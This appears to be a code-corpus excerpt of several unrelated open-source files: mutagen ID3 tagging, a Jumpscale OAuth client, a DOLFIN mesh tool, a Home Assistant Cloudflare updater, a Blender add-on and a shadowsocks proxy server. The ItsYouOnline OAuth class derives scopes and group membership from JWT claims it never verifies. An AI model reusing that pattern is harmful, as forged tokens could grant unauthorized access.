unknown_frames (list[bytes]): raw frame data of any unknown frames
found
size (int): the total size of the ID3 tag, including the header
"""
__module__ = "mutagen.id3"
PEDANTIC = True
"""`bool`:
.. deprecated:: 1.28
Doesn't have any effect
"""
filename = None
def __init__(self, *args, **kwargs):
self._header = None
self._version = (2, 4, 0)
super(ID3, self).__init__(*args, **kwargs)
@property
def version(self):
"""`tuple`: ID3 tag version as a tuple (of the loaded file)"""
if self._header is not None:
return self._header.version
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def f_unsynch(self):
if self._header is not None:
return self._header.f_unsynch
return False
@property
def f_extended(self):
if self._header is not None:
return self._header.f_extended
return False
@property
def size(self):
if self._header is not None:
return self._header.size
return 0
def _pre_load_header(self, fileobj):
# XXX: for aiff to adjust the offset..
pass
@convert_error(IOError, error)
@loadfile()
def load(
self, filething, known_frames=None, translate=True, v2_version=4, load_v1=True
):
"""Load tags from a filename.
Args:
filename (filething): filename or file object to load tag data from
known_frames (Dict[`mutagen.text`, `Frame`]): dict mapping frame
IDs to Frame objects
translate (bool): Update all tags to ID3v2.3/4 internally. If you
intend to save, this must be true or you have to
call update_to_v23() / update_to_v24() manually.
v2_version (int): if update_to_v23 or update_to_v24 get called
(3 or 4)
load_v1 (bool): Load tags from ID3v1 header if present. If both
ID3v1 and ID3v2 headers are present, combine the tags from
the two, with ID3v2 having precedence.
.. versionadded:: 1.42
Example of loading a custom frame::
my_frames = dict(mutagen.id3.Frames)
class XMYF(Frame): ...
my_frames["XMYF"] = XMYF
mutagen.id3.ID3(filename, known_frames=my_frames)
"""
fileobj = filething.fileobj
if v2_version not in (3, 4):
raise ValueError("Only 3 and 4 possible for v2_version")
self.unknown_frames = []
self._header = None
self._padding = 0
self._pre_load_header(fileobj)
try:
self._header = ID3Header(fileobj)
except (ID3NoHeaderError, ID3UnsupportedVersionError):
if not load_v1:
raise
frames, offset = find_id3v1(fileobj, v2_version, known_frames)
if frames is None:
raise
self.version = ID3Header._V11
for v in frames.values():
if len(self.getall(v.HashKey)) == 0:
self.add(v)
else:
# XXX: attach to the header object so we have it in spec parsing..
if known_frames is not None:
self._header._known_frames = known_frames
data = read_full(fileobj, self.size - 10)
remaining_data = self._read(self._header, data)
self._padding = len(remaining_data)
if load_v1:
v1v2_ver = 4 if self.version[1] == 4 else 3
frames, offset = find_id3v1(fileobj, v1v2_ver, known_frames)
if frames:
for v in frames.values():
if len(self.getall(v.HashKey)) == 0:
self.add(v)
if translate:
if v2_version == 3:
self.update_to_v23()
else:
self.update_to_v24()
def _prepare_data(self, fileobj, start, available, v2_version, v23_sep, pad_func):
if v2_version not in (3, 4):
raise ValueError("Only 3 or 4 allowed for v2_version")
config = ID3SaveConfig(v2_version, v23_sep)
framedata = self._write(config)
needed = len(framedata) + 10
fileobj.seek(0, 2)
trailing_size = fileobj.tell() - start
info = PaddingInfo(available - needed, trailing_size)
new_padding = info._get_padding(pad_func)
if new_padding < 0:
raise error("invalid padding")
new_size = needed + new_padding
new_framesize = BitPaddedInt.to_str(new_size - 10, width=4)
header = struct.pack(">3sBBB4s", b"ID3", v2_version, 0, 0, new_framesize)
data = header + framedata
assert new_size >= len(data)
data += (new_size - len(data)) * b"\x00"
assert new_size == len(data)
return data
@convert_error(IOError, error)
@loadfile(writable=True, create=True)
def save(self, filething=None, v1=1, v2_version=4, v23_sep="/", padding=None):
"""save(filething=None, v1=1, v2_version=4, v23_sep='/', padding=None)
Save changes to a file.
Args:
filething (filething):
Filename to save the tag to. If no filename is given,
the one most recently loaded is used.
v1 (ID3v1SaveOptions):
if 0, ID3v1 tags will be removed.
if 1, ID3v1 tags will be updated but not added.
if 2, ID3v1 tags will be created and/or updated
v2 (int):
version of ID3v2 tags (3 or 4).
v23_sep (text):
the separator used to join multiple text values
if v2_version == 3. Defaults to '/' but if it's None
will be the ID3v2v2.4 null separator.
padding (:obj:`mutagen.PaddingFunction`)
Raises:
mutagen.MutagenError
By default Mutagen saves ID3v2.4 tags. If you want to save ID3v2.3
tags, you must call method update_to_v23 before saving the file.
The lack of a way to update only an ID3v1 tag is intentional.
"""
f = filething.fileobj
try:
header = ID3Header(filething.fileobj)
except ID3NoHeaderError:
old_size = 0
else:
old_size = header.size
data = self._prepare_data(f, 0, old_size, v2_version, v23_sep, padding)
new_size = len(data)
if old_size < new_size:
insert_bytes(f, new_size - old_size, old_size)
elif old_size > new_size:
delete_bytes(f, old_size - new_size, new_size)
f.seek(0)
f.write(data)
self.__save_v1(f, v1)
def __save_v1(self, f, v1):
tag, offset = find_id3v1(f)
has_v1 = tag is not None
f.seek(offset, 2)
if v1 == ID3v1SaveOptions.UPDATE and has_v1 or v1 == ID3v1SaveOptions.CREATE:
f.write(MakeID3v1(self))
else:
f.truncate()
@loadfile(writable=True)
def delete(self, filething=None, delete_v1=True, delete_v2=True):
"""delete(filething=None, delete_v1=True, delete_v2=True)
Remove tags from a file.
Args:
filething (filething): A filename or `None` to use the one used
when loading.
delete_v1 (bool): delete any ID3v1 tag
delete_v2 (bool): delete any ID3v2 tag
If no filename is given, the one most recently loaded is used.
"""
delete(filething, delete_v1, delete_v2)
self.clear()
@convert_error(IOError, error)
@loadfile(method=False, writable=True)
def delete(filething, delete_v1=True, delete_v2=True):
"""Remove tags from a file.
Args:
delete_v1 (bool): delete any ID3v1 tag
delete_v2 (bool): delete any ID3v2 tag
Raises:
mutagen.MutagenError: In case deleting failed
"""
f = filething.fileobj
if delete_v1:
tag, offset = find_id3v1(f)
if tag is not None:
f.seek(offset, 2)
f.truncate()
# technically an insize=0 tag is invalid, but we delete it anyway
# (primarily because we used to write it)
if delete_v2:
f.seek(0, 0)
idata = f.read(10)
try:
id3, vmaj, vrev, flags, insize = struct.unpack(">3sBBB4s", idata)
except struct.error:
pass
else:
insize = BitPaddedInt(insize)
if id3 == b"ID3" and insize >= 0:
delete_bytes(f, insize + 10, 0)
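# Illustrative usage sketch ("song.mp3" is a placeholder filename):
#
#   tags = ID3("song.mp3")                    # load ID3v2 (and ID3v1) tags
#   tags.update_to_v23()                      # needed before saving as v2.3
#   tags.save(v2_version=3, v1=ID3v1SaveOptions.UPDATE)
#   delete("song.mp3", delete_v1=True, delete_v2=False)  # strip only ID3v1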
class ID3FileType(mutagen.FileType):
"""ID3FileType(filething, ID3=None, **kwargs)
An unknown type of file with ID3 tags.
Args:
filething (filething): A filename or file-like object
ID3 (ID3): An ID3 subclass to use for tags.
Raises:
mutagen.MutagenError: In case loading the file failed
Load stream and tag information from a file.
A custom tag reader may be used in instead of the default
mutagen.id3.ID3 object, e.g. an EasyID3 reader.
"""
__module__ = "mutagen.id3"
ID3 = ID3
class _Info(mutagen.StreamInfo):
length = 0
def __init__(self, fileobj, offset):
pass
@staticmethod
def pprint():
return u"Unknown format with ID3 tag"
@staticmethod
def score(filename, fileobj, header_data):
return header_data.startswith(b"ID3")
def add_tags(self, ID3=None):
"""Add an empty ID3 tag to the file.
Args:
ID3 (ID3): An ID3 subclass to use or `None` to use the one
that used when loading.
A custom tag reader may be used in instead of the default
`ID3` object, e.g. an `mutagen.easyid3.EasyID3` reader.
"""
if ID3 is None:
ID3 = self.ID3
if self.tags is None:
self.ID3 = ID3
self.tags = ID3()
else:
raise error("an ID3 tag already exists")
@loadfile()
def load(self, filething, ID3=None, **kwargs):
# see __init__ for docs
fileobj = filething.fileobj
if ID3 is None:
ID3 = self.ID3
else:
# If this was initialized with EasyID3, remember that for
# when tags are auto-instantiated in add_tags.
self.ID3 = ID3
try:
self.tags = ID3(fileobj, **kwargs)
except ID3NoHeaderError:
self.tags = None
if self.tags is not None:
try:
offset = self.tags.size
except AttributeError:
offset = None
else:
offset = None
self.info = self._Info(fileobj, offset)
| gpl-3.0 | -1,115,696,369,756,836,000 | 28.075472 | 86 | 0.566029 | false |
Jumpscale/jumpscale_core8 | lib/JumpScale/clients/oauth/OauthInstance.py | 1 | 5063 | import urllib.request
import urllib.parse
import urllib.error
import string
import requests
import time
import random
from JumpScale import j
class AuthError(Exception):
pass
class UserInfo(object):
def __init__(self, username, emailaddress, groups):
self.username = username
self.emailaddress = emailaddress
self.groups = groups
class OauthInstance:
def __init__(self, addr, accesstokenaddr, id, secret, scope, redirect_url, user_info_url, logout_url, instance):
if not addr:
hrd = j.application.getAppInstanceHRD('oauth_client', instance)
self.addr = hrd.get('instance.oauth.client.url')
self.accesstokenaddress = hrd.get('instance.oauth.client.url2')
self.id = hrd.get('instance.oauth.client.id')
self.scope = hrd.get('instance.oauth.client.scope')
self.redirect_url = hrd.get('instance.oauth.client.redirect_url')
self.secret = hrd.get('instance.oauth.client.secret')
self.user_info_url = hrd.get('instance.oauth.client.user_info_url')
self.logout_url = hrd.get('instance.oauth.client.logout_url')
else:
self.addr = addr
self.id = id
self.scope = scope
self.redirect_url = redirect_url
self.accesstokenaddress = accesstokenaddr
self.secret = secret
self.user_info_url = user_info_url
self.logout_url = logout_url
self.state = ''.join(random.choice(
string.ascii_uppercase + string.digits) for _ in range(30))
@property
def url(self):
params = {'client_id': self.id, 'redirect_uri': self.redirect_url,
'state': self.state, 'response_type': 'code'}
if self.scope:
params.update({'scope': self.scope})
return '%s?%s' % (self.addr, urllib.parse.urlencode(params))
def getAccessToken(self, code, state):
payload = {'code': code, 'client_id': self.id, 'client_secret': self.secret,
'redirect_uri': self.redirect_url, 'grant_type': 'authorization_code',
'state': state}
result = requests.post(self.accesstokenaddress, data=payload, headers={
'Accept': 'application/json'})
if not result.ok or 'error' in result.json():
msg = result.json()['error']
j.logger.log(msg)
raise AuthError(msg)
return result.json()
def getUserInfo(self, accesstoken):
params = {'access_token': accesstoken['access_token']}
userinforesp = requests.get(self.user_info_url, params=params)
if not userinforesp.ok:
msg = 'Failed to get user details'
j.logger.log(msg)
raise AuthError(msg)
userinfo = userinforesp.json()
return UserInfo(userinfo['login'], userinfo['email'], ['user'])
class ItsYouOnline(OauthInstance):
def getAccessToken(self, code, state):
import jose
import jose.jwt
scope = self.scope + ',offline_access'
organization = j.portal.server.active.cfg['organization']
payload = {'code': code, 'client_id': self.id, 'client_secret': self.secret,
'redirect_uri': self.redirect_url, 'grant_type': '', 'scope': scope,
'response_type': 'id_token', 'state': state, 'aud': organization}
result = requests.post(self.accesstokenaddress, data=payload, headers={
'Accept': 'application/json'})
if not result.ok:
msg = result.text
j.logger.log(msg)
raise AuthError(msg)
token = result.json()
# convert jwt expire time to oauth2 token expire time
jwtdata = jose.jwt.get_unverified_claims(token['access_token'])
token['expires_in'] = jwtdata['exp'] - time.time()
return token
def getUserInfo(self, accesstoken):
import jose
import jose.jwt
jwt = accesstoken['access_token']
headers = {'Authorization': 'bearer %s' % jwt}
jwtdata = jose.jwt.get_unverified_claims(jwt)
scopes = jwtdata['scope']
requestedscopes = set(self.scope.split(','))
if set(jwtdata['scope']).intersection(requestedscopes) != requestedscopes:
msg = 'Failed to get the requested scope for %s' % self.client.id
raise AuthError(msg)
username = jwtdata['username']
userinfourl = self.user_info_url.rstrip('/') + "/%s/info" % username
userinforesp = requests.get(userinfourl, headers=headers)
if not userinforesp.ok:
msg = 'Failed to get user details'
raise AuthError(msg)
groups = ['user']
for scope in scopes:
parts = scope.split(':')
if len(parts) == 3 and parts[:2] == ['user', 'memberof']:
groups.append(parts[-1].split('.')[-1])
userinfo = userinforesp.json()
return UserInfo(userinfo['username'], userinfo['emailaddresses'][0]['emailaddress'], groups)
| apache-2.0 | -8,568,296,709,341,277,000 | 37.067669 | 116 | 0.598064 | false |
MelanieBittl/dolfin | site-packages/dolfin/mesh/boundarysubdomainfinder.py | 3 | 5586 | # Copyright (C) 2008 Kent-Andre Mardal
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import sys
import getopt
import six
from dolfin import *
import numpy
import operator
from functools import reduce
def create_maps(boundary_mesh):
"""
Create mappings between vertices and cells on the boundary mesh
"""
c2v = {}
v2c = {}
for cell in cells(boundary_mesh):
for vertex in vertices(cell):
v = vertex.index()
c = cell.index()
if c in c2v:
c2v[c].append(v)
else:
c2v[c] = [v]
if v in v2c:
v2c[v].append(c)
else:
v2c[v] = [c]
return v2c, c2v
def find_subdomain(start_vertex, v2c, c2v):
"""
Find all cells connected with the start_vertex
"""
next = c2v[v2c[start_vertex][0]][1]
done = False
previous_vertex = start_vertex
previous_cell = v2c[start_vertex][0]
subdomain = {}
while not done:
c0, c1 = v2c[previous_vertex]
if c0 == previous_cell:
next_cell = c1
elif c1 == previous_cell:
next_cell = c0
else:
print("None of the vertices were the previous vertex ??")
v0, v1 = c2v[next_cell]
if v0 == previous_vertex:
next_vertex = v1
elif v1 == previous_vertex:
next_vertex = v0
else:
print("None of the vertices were the previous vertex ??")
if next_cell in subdomain:
done = True
else:
subdomain[next_cell] = True
previous_vertex = next_vertex
previous_cell = next_cell
return subdomain
def find_new_cell_key(c2v, keys):
"""
Find new cell.
"""
done = False
iter = list(c2v.keys()).__iter__()
while not done:
key = six.advance_iterator(iter)
if key in keys:
pass
else:
done = True
return key
def write_file(outfilename, mesh, subdomains):
str = """<?xml version="1.0" encoding="UTF-8"?>
<dolfin xmlns:dolfin="http://fenicsproject.org">
<meshfunction type="uint" dim="1" size="%d">
""" % mesh.numFacets()
for key in list(subdomains.keys()):
str += "\n <entity index=\"%d\" value=\"%d\"/>" % (key, subdomains[key])
str += """
</meshfunction>
</dolfin>
"""
f = open(outfilename, 'w')
f.write(str)
f.close()
def find_keys_on_one_subdomain(c2v, v2c, all_keys):
try:
flat_keys = []
if len(all_keys) > 0:
flat_keys = reduce(operator.add, all_keys)
new_cell_key = find_new_cell_key(c2v, flat_keys)
vertex_key = c2v[new_cell_key][0]
subdomain = find_subdomain(vertex_key, v2c, c2v)
new_keys = list(subdomain.keys());
new_keys.sort()
all_keys.append(new_keys)
return all_keys
except Exception as e:
# print "done with finding the subdomains"
pass
def find_all_subdomains(ifilename, ofilename):
mesh = Mesh(ifilename)
if mesh.geometry().dim() != 2:
print("This script does only work in 2D.")
print("(It should be possible to extend to 3D, though)")
exit(2)
boundary_mesh = BoundaryMesh(mesh)
boundary_cell_map = boundary_mesh.data().meshFunction("cell map")
v2c, c2v = create_maps(boundary_mesh)
done = False
keys = []
subdomains = {}
all_keys = []
prev_keys = []
while not done:
new_keys = find_keys_on_one_subdomain(c2v, v2c, prev_keys)
if new_keys == None:
done = True
all_keys = prev_keys
else:
prev_keys = new_keys
for i in range(0, mesh.numFacets()):
subdomains[i] = len(all_keys)
counter = 0
for keys in all_keys:
for key in keys:
subdomains[boundary_cell_map.array()[key]] = counter
counter+=1
write_file(ofilename, mesh, subdomains)
def usage():
"Display usage"
print("""\
Usage: boundarysubdomainfinder.py -i input.xml -o output.xml
Options:
-h display this help text and exit
-i specify input file
-o specify output file
Alternatively, the following long options may be used:
--help same as -h
--input same as -i
--output same as -o
""")
def main(argv):
"Main function"
# Get command-line arguments
try:
opts, args = getopt.getopt(argv, "hi:o:", ["help", "input=", "output="])
except getopt.GetoptError:
usage()
sys.exit(2)
ifilename = None
ofilename = None
for opt, arg in opts:
if opt in ("-i", "--infile"):
ifilename = arg
elif opt in ("-o", "--outfile"):
ofilename = arg
else:
print("Option not recoginized")
find_all_subdomains(ifilename, ofilename)
if __name__ == '__main__':
main(sys.argv[1:])
| gpl-3.0 | -5,786,090,352,813,916,000 | 23.716814 | 84 | 0.57662 | false |
auduny/home-assistant | homeassistant/components/cloudflare/__init__.py | 7 | 2188 | """Update the IP addresses of your Cloudflare DNS records."""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.const import CONF_API_KEY, CONF_EMAIL, CONF_ZONE
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import track_time_interval
_LOGGER = logging.getLogger(__name__)
CONF_RECORDS = 'records'
DOMAIN = 'cloudflare'
INTERVAL = timedelta(minutes=60)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_EMAIL): cv.string,
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_ZONE): cv.string,
vol.Required(CONF_RECORDS): vol.All(cv.ensure_list, [cv.string]),
})
}, extra=vol.ALLOW_EXTRA)
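# Example configuration.yaml entry (values below are placeholders):
#
#   cloudflare:
#     email: [email protected]
#     api_key: YOUR_API_KEY
#     zone: example.com
#     records:
#       - home
#       - www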
def setup(hass, config):
"""Set up the Cloudflare component."""
from pycfdns import CloudflareUpdater
cfupdate = CloudflareUpdater()
email = config[DOMAIN][CONF_EMAIL]
key = config[DOMAIN][CONF_API_KEY]
zone = config[DOMAIN][CONF_ZONE]
records = config[DOMAIN][CONF_RECORDS]
def update_records_interval(now):
"""Set up recurring update."""
_update_cloudflare(cfupdate, email, key, zone, records)
def update_records_service(now):
"""Set up service for manual trigger."""
_update_cloudflare(cfupdate, email, key, zone, records)
track_time_interval(hass, update_records_interval, INTERVAL)
hass.services.register(
DOMAIN, 'update_records', update_records_service)
return True
def _update_cloudflare(cfupdate, email, key, zone, records):
"""Update DNS records for a given zone."""
_LOGGER.debug("Starting update for zone %s", zone)
headers = cfupdate.set_header(email, key)
_LOGGER.debug("Header data defined as: %s", headers)
zoneid = cfupdate.get_zoneID(headers, zone)
_LOGGER.debug("Zone ID is set to: %s", zoneid)
update_records = cfupdate.get_recordInfo(headers, zoneid, zone, records)
_LOGGER.debug("Records: %s", update_records)
result = cfupdate.update_records(headers, zoneid, update_records)
_LOGGER.debug("Update for zone %s is complete", zone)
if result is not True:
_LOGGER.warning(result)
| apache-2.0 | -4,421,321,578,304,429,600 | 30.257143 | 76 | 0.691042 | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons_contrib/sequencer_tools/__init__.py | 2 | 4298 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Sequencer Tools",
"author": "mont29",
"version": (0, 0, 2),
"blender": (2, 66, 0),
"location": "Sequencer menus/UI",
"description": "Various Sequencer tools.",
"warning": "",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Sequencer/Tools",
"tracker_url": "https://developer.blender.org/T31549",
"support": 'TESTING',
"category": "Sequencer",
}
if "bpy" in locals():
import imp
imp.reload(export_strips)
else:
import bpy
from . import export_strips
KEYMAPS = (
# First, keymap identifiers (last bool is True for modal km).
(("Sequencer", "WINDOW", "SEQUENCE_EDITOR", False), (
# Then a tuple of keymap items, defined by a dict of kwargs for the km new func, and a tuple of tuples (name, val)
# for ops properties, if needing non-default values.
({"idname": export_strips.SEQExportStrip.bl_idname, "type": "P", "value": "PRESS", "shift": True, "ctrl": True},
()),
)),
)
def menu_func(self, context):
self.layout.operator(export_strips.SEQExportStrip.bl_idname, text="Export Selected")
def find_keymap_items(km, idname):
return (i for i in km.keymap_items if i.idname == idname)
def update_keymap(activate):
# Add.
if activate:
kconf = bpy.context.window_manager.keyconfigs.addon
if not kconf:
return # happens in background mode...
for km_info, km_items in KEYMAPS:
km_name, km_regtype, km_sptype, km_ismodal = km_info
kmap = [k for k in kconf.keymaps
if k.name == km_name and k.region_type == km_regtype and
k.space_type == km_sptype and k.is_modal == km_ismodal]
if kmap:
kmap = kmap[0]
else:
kmap = kconf.keymaps.new(km_name, region_type=km_regtype, space_type=km_sptype, modal=km_ismodal)
for kmi_kwargs, props in km_items:
kmi = kmap.keymap_items.new(**kmi_kwargs)
kmi.active = True
for prop, val in props:
setattr(kmi.properties, prop, val)
# Remove.
else:
# XXX We must also clean up user keyconfig, else, if user has customized one of our shortcut, this
# customization remains in memory, and comes back when re-enabling the addon, causing a segfault... :/
kconfs = bpy.context.window_manager.keyconfigs
for kconf in (kconfs.user, kconfs.addon):
for km_info, km_items in KEYMAPS:
km_name, km_regtype, km_sptype, km_ismodal = km_info
kmaps = (k for k in kconf.keymaps
if k.name == km_name and k.region_type == km_regtype and
k.space_type == km_sptype and k.is_modal == km_ismodal)
for kmap in kmaps:
for kmi_kwargs, props in km_items:
for kmi in find_keymap_items(kmap, kmi_kwargs["idname"]):
kmap.keymap_items.remove(kmi)
# XXX We won’t remove addons keymaps themselves, other addons might also use them!
def register():
bpy.utils.register_module(__name__)
bpy.types.SEQUENCER_MT_strip.append(menu_func)
update_keymap(True)
def unregister():
update_keymap(False)
bpy.types.SEQUENCER_MT_strip.remove(menu_func)
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| gpl-2.0 | 3,772,550,606,359,670,300 | 36.684211 | 120 | 0.610568 | false |
linkerlin/shadowsocks-server | sserver.py | 2 | 10464 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 clowwindy
# Copyright (c) 2014 v3aqb
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
__version__ = '1.0.0'
import sys
if sys.version_info < (2, 6):
import simplejson as json
else:
import json
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import thread
import threading
import SocketServer
import struct
import logging
import getopt
import encrypt
import os
import urlparse
from util import create_connection, getaddrinfo, parse_hostport, get_ip_address
def send_all(sock, data):
bytes_sent = 0
while True:
r = sock.send(data[bytes_sent:])
if r < 0:
return r
bytes_sent += r
if bytes_sent == len(data):
return bytes_sent
class ShadowsocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
p = urlparse.urlparse(serverinfo)
encrypt.check(p.password, p.username)
self.key, self.method = p.password, p.username
self.aports = [int(k) for k in urlparse.parse_qs(p.query).get('ports', [''])[0].split(',') if k.isdigit()]
reverse = urlparse.parse_qs(p.query).get('reverse', [''])[0]
self.reverse = parse_hostport(reverse) if reverse else None
addrs = getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
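    # The server URL is therefore expected to look like (illustrative values):
    #   ss://<method>:<password>@<listen-host>:<port>/?ports=80,443&reverse=127.0.0.1:8118
    # where the optional `ports` query parameter whitelists destination ports
    # and `reverse` relays all traffic through an upstream HTTP proxy.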
def server_activate(self):
self.socket.listen(self.request_queue_size)
class Socks5Server(SocketServer.StreamRequestHandler):
timeout = 20
bufsize = 8192
def handle_tcp(self, local, remote, timeout=60):
def _io_copy(dest, source, timeout, cipher):
try:
dest.settimeout(timeout)
source.settimeout(timeout)
while 1:
data = source.recv(self.bufsize)
if not data:
break
dest.sendall(cipher(data))
except socket.timeout:
pass
except (IOError, OSError) as e:
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
if e.args[0] in (errno.EBADF,):
return
finally:
for sock in (dest, source):
try:
sock.close()
except (IOError, OSError):
pass
thread.start_new_thread(_io_copy, (remote.dup(), local.dup(), timeout, self.decrypt))
_io_copy(local, remote, timeout, self.encrypt)
def encrypt(self, data):
return self.encryptor.encrypt(data)
def decrypt(self, data):
return self.encryptor.decrypt(data)
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def handle(self):
self.remote = None
try:
self.encryptor = encrypt.Encryptor(self.server.key, self.server.method, servermode=True)
sock = self.connection
# sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
iv_len = self.encryptor.iv_len()
if iv_len:
try:
self.decrypt(self.rfile.read(iv_len))
except ValueError:
                    logging.warn('server %s:%d iv reused, possible replay attack. closing...' % self.server.server_address)
return
data = sock.recv(1)
if not data:
return
addrtype = ord(self.decrypt(data))
if addrtype == 1:
addr = socket.inet_ntoa(self.decrypt(self.rfile.read(4)))
elif addrtype == 3:
addr = self.decrypt(self.rfile.read(ord(self.decrypt(self.rfile.read(1)))))
elif addrtype == 4:
addr = socket.inet_ntop(socket.AF_INET6, self.decrypt(self.rfile.read(16)))
else: # not supported
logging.warn('server %s:%d addr_type not supported, maybe wrong password' % self.server.server_address)
return
port = struct.unpack('>H', self.decrypt(self.rfile.read(2)))[0]
if self.server.aports and port not in self.server.aports:
logging.info('server %s:%d port %d not allowed' % (self.server.server_address[0], self.server.server_address[1], port))
return
if self._request_is_loopback((addr, port)):
logging.info('server %s:%d localhost access denied' % self.server.server_address)
return
try:
logging.info('server %s:%d request %s:%d from %s:%d' % (self.server.server_address[0], self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1]))
data = self.decrypt(sock.recv(self.bufsize))
if self.server.reverse:
if data.startswith((b'GET', b'POST', b'HEAD', b'PUT', b'DELETE', b'TRACE', b'OPTIONS', b'PATCH', b'CONNECT')) and b'HTTP/1' in data and b'\r\n' in data:
data = data.decode('latin1')
data = data.replace('\r\n', '\r\nss-realip: %s:%s\r\nss-client: %s\r\n' % (self.client_address[0], self.client_address[1], self.server.key), 1)
self.remote = create_connection(self.server.reverse, timeout=10)
else:
a = 'CONNECT %s:%d HTTP/1.0\r\nss-realip: %s:%s\r\nss-client: %s\r\n\r\n' % (addr, port, self.client_address[0], self.client_address[1], self.server.key)
self.remote = create_connection(self.server.reverse, timeout=10)
self.remote.sendall(a.encode('latin1'))
remoterfile = self.remote.makefile('rb', 0)
d = remoterfile.readline()
while d not in (b'\r\n', b'\n', b'\r'):
if not d:
raise IOError(0, 'remote closed')
d = remoterfile.readline()
if not self.remote:
self.remote = create_connection((addr, port), timeout=10)
self.remote.sendall(data)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
self.handle_tcp(sock, self.remote)
except socket.error as e:
logging.warn('server %s:%d %r' % (self.server.server_address[0], self.server.server_address[1], e))
def finish(self):
SocketServer.StreamRequestHandler.finish(self)
if self.remote:
self.remote.close()
def start_servers(config):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = ShadowsocksServer(serverinfo, Socks5Server)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'shadowsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
config_path = None
server = None
if os.path.exists(os.path.join(os.path.dirname(__file__), 'config.json')):
config_path = os.path.join(os.path.dirname(__file__), 'config.json')
try:
optlist, args = getopt.getopt(sys.argv[1:], 'c:f:')
for key, value in optlist:
if key == '-f':
config_path = value
if key == '-c':
server = value
if server:
config = [server]
elif config_path:
logging.info('loading config from %s' % config_path)
with open(config_path, 'rb') as f:
try:
config = json.load(f)
except ValueError as e:
logging.error('found an error in config.json: %s', e.message)
sys.exit(1)
else:
config = ['ss://aes-256-cfb:[email protected]:8388', ]
except getopt.GetoptError:
sys.exit(2)
start_servers(config)
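# config.json is expected to contain a JSON list of server URLs, e.g.
# (placeholder values): ["ss://aes-256-cfb:[email protected]:8388"]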
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
| mit | 5,911,844,524,637,377,000 | 38.787072 | 177 | 0.578842 | false |
Lektorium-LLC/edx-platform | common/djangoapps/third_party_auth/tests/specs/base.py | 2 | 49399 | """Base integration test for provider implementations."""
import unittest
import json
import mock
from contextlib import contextmanager
from django import test
from django.contrib import auth
from django.contrib.auth import models as auth_models
from django.contrib.messages.storage import fallback
from django.contrib.sessions.backends import cache
from django.core.urlresolvers import reverse
